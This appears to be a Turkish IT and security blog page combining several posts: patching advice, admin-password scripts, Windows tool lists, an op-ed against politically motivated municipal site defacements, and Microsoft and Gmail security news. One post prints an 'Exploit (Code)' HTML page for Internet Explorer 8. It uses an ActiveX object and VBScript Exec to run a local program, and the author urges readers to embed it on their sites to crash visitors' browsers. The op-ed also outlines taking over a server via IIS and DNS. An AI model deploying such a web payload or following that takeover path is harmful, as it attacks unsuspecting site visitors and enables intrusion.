TrustWave Firmasının yaptığı araştırmaya göre, Güvenlik açıklarının yenisi değil, Eskisi tehlikeli-imiş. 200 taneden fazla Veri Hırsızlığını inceleyen firma, Güvenlik açıklarını Test eden profesyonel Güvenlik uzmanlarının Güncel yazılımların Güvenlik açıklarına daha çok dikkat ettiğini, Eski güncellenmeyen yazılımların ise açıklarının öylece kaldığını ortaya çıkarttı.
İlginç sonuçlara gebe olan araştırma, Ne varsa eskilerde var sözünü hatırlattı bir an için.. Eskiden kullandığımız pek çok program ya-da güncellemediğimiz bir İşletim Sistemimiz verilerimizin kaybına, bozulmasına yada çalınmasına sebep olabilir. Üstelik Anti-virüs, Casus yazılım temizleme aracı gibi korunma programları kullanamakta bunlara çözüm olmamaktadır. Yine aynı orantıda düşündüğümüz zaman Antivirüs programlarının pek çoğu Güncel olmayan yazılımların Güvenlik açıklarını tespit edememekte ve neyin ne derece de tehlike arz ettiğini bildirememektedir.
Peki ne yapmalı ?
> Sisteminize Bilgisayarınızdaki Güvenlik açıklarını otomatik olarak gösteren yazılımlardan kurun. Tavsiyem Secunia Firmasının üçretsiz yazılımı Secunia Personal Software Inspector. Güncel olmayanları ve Güvenlik açığı teşkil edenleri otomatik olarak tespit edip, Güncellemenizi, Açıklarınızı kapatmanızı sağlayacaktır. Üstelik bunu Görsel yani grafiksel olarakta yapmaktadır.
> İşletim Sisteminizi mutlaka Son Sürüm Yamalarla kullanın. Üşenmeyin! Yamalayın.
> İşletim Sisteminizde kullandığınız Programları mutlaka Son Sürümüne update edin.
> Beni takip edin 
Soru: Local’de kullandığımız Administrator Şifreleri ( Admin Password )’ler Script ile otomatik olarak değiştirilebilir mi ?
Cevap: Evet değiştirmemiz mümkündür. Bunun için aşağıda verdiğim kodları txt dosyasına yapıştırıp uzantısını .vbs yapmanız ve Domain ortamında yapınıza uygulamanız yeterlidir.
strComputer = “127.0.0.1″
Set objUser = GetObject(“WinNT://” & strComputer & “/Administrator, user”)
objUser.SetPassword “yenişifre”
objUser.SetInfo
Soru: Group Policy Object (GPO) ile Local Admin Şifresini değiştirebilirmiyiz ?
Cevap: Evet. Bu’da mümkündür. Aşağıdaki komutu GPO ile uygulattığınız zaman Admin şifresi değiştirme aktif olacaktır.
Komut: net user administrator ‘yenisifre’
1) Karakter Eşlem = charmap.exe
2) Disk temizleme = cleanmgr.exe
3) Pano defteri görüntüleyici = clipbrd.exe (panoya alınmış bilgiyi gösterir)
4) Dr Watson = drwtsn32.exe (Aksaklıkları giderme aracı)
5) DirectX tanısı = dxdiag.exe (DirectX’i inceleme ve test etme)
6) Özel karakter düzenleyici = eudcedit.exe 0(yeni karakter oluşturma veya düzenleme)
7) IExpress Sihirbası= iexpress.exe (self-extracting ve self-installing paketleri oluşturmak)
8)Microsoft Eşitleme Yöneticisi = mobsync.exe (Çevrimdışı kullanım için network ve internet eşitleme
yöneticisi).
9) Windows Media Player 5.1 = mplay32.exe
10) ODBC Veri KAynağı Yöneticisi = odbcad32.exe (Veri tabanları için kullanılır)
11) Nesne Paketleyici = packager.exe
12) Sistem Monitörü = perfmon.exe (Oldukça kullanışlı, hızlı ayarlanabilir , PC nizle ilgili istediğiniz performans
bilgilerine anında ulaşma imkanı)
Devamını oku…
Har{D}iskimin arka sokaklarında dolaşırken karşıma bir dizi Eğitim notları çıktı. Eğitim notları içeriği şöyledir;
# Macromedia Flash Eğitim Notları
# USB Rehberi Eğitim Notları
# Network Eğitim Notları
# AutoCad Eğitim Notları
# CorelDraw Eğitim Notları
# PhotoShop Eğiitim Notları
# Visual Basic Eğitim Notları
Dosyayı indirmek için TIKLAYIN.
Rar şifresi: www.onuroktay.com
Siyasi gündem her zaman için Hacking’de kullanılmıştır. Türk korsanlar; ülkenin siyasi gündemi, dış ülkelerle sorunlar gibi toplumsal konularda pek sessiz kalmayı tercih etmezler. Genelliklede bu tip saldırılar ses getirir, camia da yankı uyandırır. Ancak son zamanlarda ülkemizde artan bir eğilim daha görüyorum ki ; O’da Belediyelerin Web sitelerinin hack edilmesidir.
İktidar ya da muhalefet ya da ters düşünce her ne derseniz deyin.. Kendi Siyasi propagandansını yapmak için X partisine ait bir yerin (il – ilçe – belde – ne olursa olsun) Hack edilmesi ve bu Hack üzerinden Propaganda yapılmaya çalışılması oldukça gereksiz ve üzücü.
Gereksiz; Çünkü Hack edilerek yapılan Propagandanın kime ne yararı var ? A nicknameli Hacker X belediyesinin Web sitesini hack edince ve kendi düşüncesine uyan Partinin Siyasi Propagandasını yapınca kendi partisine oy mu kazandırmış oluyor ? Ya da bu durumdan kendi siyasi partisi Artı(+) bir şey kazanıyor da diğer X belediyesinin partisi Eksi(-) mi alıyor ? Hack edilen belediyenin Web Sitesine index atılır atılamaz Belediyenin Bilgi İşlem Biriminde çalışan ilgili Web sitesi sorumlusu kişi aldığı Backup’tan geri dönerek siteyi aynen devam ettiriyor.
Eee ne anladım ben bu işten ? Kaç dakika sürdü senin Siyasi propagandan ? Ya bu işi tamamen layıkıyla yapacaksın.. Web Server’a gireceksin, IIS’i ele geçireceksin, DNS’leri yönlendireceksin Ve oradan Server’a Root olarak geçiş yaparak full olarak Sistemin kontrolünü ele alacaksın ve X Belediyesinin tüm sistemlerini kontrol edebilir olacaksın o zaman işte yaptığın propaganda tam olarak yerini bulur ve sen başarılı bir Hacker olursun… Yoksa sadece Web sitesini Deface etmekle şatafatlı bir index çakmak ve altına gaz verici bir müzik çakmakla bu işler olmuyor hacker kardeşlerim…
Bu işin GEREKSİZ tarafıydı… Üzücü tarafına geleceksek olursak… Hacker’ım diye geçinen ve bu işlere bulaşan arkadaşlara tavsiyemdir.. Kendinizi geliştirin. Abuk subuk bir kaç web portalının XSS, SQL Injection gibi güvenlik açıklarıyla siteleri Deface etmeyin. Yıkmayı bilin ama Kurmayı da öğrenin. Bu işi yapan hackerlığa hevesli adamları bir yere toplayıp SQL ile indirdiğiniz Web sitesinin Web Server’ını kurun, IIS’ini kurun ve DNS Serverlerini ayarlayip NS kayıtlarını girin desek.. Bir çoğu ağzı açık bakar buna eminim.. Kendinizi gereksiz şeylerle oyalamaktansa, Egonuzu tatmin etmektense bu işlere daha profesyonel yaklaşın.
Türkiye’de Hackerlık 2004-2005 yılları arasında son hızındaydı ve bitti. Şimdilerde sadece ADSL kültürünün getirmiş olduğu yozlaşma söz konusu. Eli Mouse tutan, Cmd’de Ping -t çekebilen Hacker’ım diyor. Siz O’nlardan olmayın.. Bu işi profesyonel olarak yapan kişileri takip edin, Onlarla istişarelerde bulunun ve en önemlisi aklınız selim olduğu vakit bu işlerden para kazanmaya çalışın. Yoksa ben ve benim gibi bu işleri geçen kişiler sizlere üzülmeye devam edecektir.
Geçtiğimiz günlerde ŞURADA bahsettiğim ve BugtraqList’lerde raporlanmaya başlanan kritik IE Güvenlik açığı için Microsoft bülten yayınladı. TechNet Bültenleri arasında Critical IE Security Update konusu başı çekiyor.
Microsoft Internet Explorer’ın tüm sürümlerine özel Güvenlik yaması listesi yayınlamış. Microsoft Security Bulletin MS10-002 – Critical olarak geçen Güvenlik Yaması Bülteninin listesine BURADAN ulaşabilirsiniz. IE sürümünüze ve işletim sisteminize göre seçim yaparak kritik güvenlik güncelleştirmesini yapıp, daha güvenli bir IE kullanabilirsiniz.
Microsoft’un en çok kullanılan Server işletim sistemi olan Server 2003 sürümü ve Server 2003 Ailesini inceleyeceğiz hep birlikte. Aslında bu konuyu bu bloğu açtığım gün ya da bir kaç gün sonrasında anlatmam gerekiyordu.. Üzerinden de epey geçti.. Ancak o dönemde buna gerek duymadım.. Biliyorum ki pek çok kişi Server 2003 kurulumunu artık gözü kapalı yapıyor, Tabir-i caize takla attırıyor. (En azından benim öğrencilerim öyle)
MCSE Derslerinin hemen başında Server ailesini tanıtırken öğrencilerime onlarla paylaştığım bir PowerPoint Sunusunu da sizler için upload ettim. Dilerseniz yazımı okuduktan sonra en sondaki PowerPoint Sunusunu da indirerek Görsel olarak Server 2003 kurulumuna bakabilirsiniz.
Genel Bir Bakış
Windows Server 2003 ve 2008 Microsoft’un geliştirdiği en son sunucu işletim sistemidir. Windows 2000 Sunucu ailesi gibi NT teknolojisi üzerine kurulmuştur. Her türlü gereksinimi karşılayabilmek için Microsoft, “Windows Server 2003 Ailesi” diye adlandırabileceğimiz dört farklı Windows Server 2003 seçeneği sunmaktadır.
Windows Server 2003 kullanmaya başlamadan önce “Server” adı taşıyan bu ürün ailesini ve hangi sürümün bizim ihtiyaçlarımızı karşılayabileceğini bilmeliyiz.
Windows Server 2003 Ailesi
•Windows Server 2003 – Standart Edition
•Windows Server 2003 – Web Edition
•Windows Server 2003 – Enterprise Edition
•Windows Server 2003 – Datacenter Edition
Olmak üzere dört farklı işletim sisteminden oluşmaktadır. Şimdi bu işletim sistemlerini daha yakından tanıyalım…
Devamını oku…
Risk: Yüksek
Etki: Activex denetimleri bozarak Explorer’ın tampon bellek taşmasına neden olması
Etkilenenler: Internet Explorer 8 – OS: XP, Vista, Windows 7
Exploit (Code):
<html>
<p align=”left”><b><font face=”SegoeScript”
size=”7″> &am
p;nbsp; &nbs
p; &am
p;nbsp;
&
nbsp;
</font></b></p>
<p>
<object classid=’clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8′ id=’target’
></object>
<script language=’vbscript’>
arg1=”c:WINDOWSsystem32calc.exe”
target.Exec arg1
</script></p>
Not: Yukarıdaki kodu direk olarak Web sitenizin bir bölümünde HTML olarak gömüp sayfanıza girip çıkanların ActiveX’ine eziyet çektirebilirsiniz. Internet Explorer 8 bir süre kasılıyor, tampon bellekte aktarım sorunlar yaşıyor ve çalışmaz hale geliyor.
Google Gmail için geçtiğimiz yıllarda daha fazla güvenlik için https protokolünü kullanıcılarına seçimin sunmuştu. Bu durum Gmail servislerini birazcık yavaşlatsa da, Google haliyle bunun Güvenlik için gerekli olduğunu söylemişti..
Şimdilerde Google bu HTTPS Güvenlik olayını tüm Gmail Kullanıcılarına Standart hale getirmeye karar vermiş durumda. Gmail bundan böyle http/s olarak daha güvenli bir E-posta servisi haline gelecek.
HTTP ile HTTP/S Arasında Ne Fark Var ?
Http/s protokolünde kullanıcılar arasındaki E-posta Mesajları Internet üzerinden Şifrelenerek gönderiliyor. Bu’da mesajın Gönderenle-Alıcı arasında akarken 3′ncü parti yazılımlar tarafından deşifre edilerek okunmasını engelliyor.
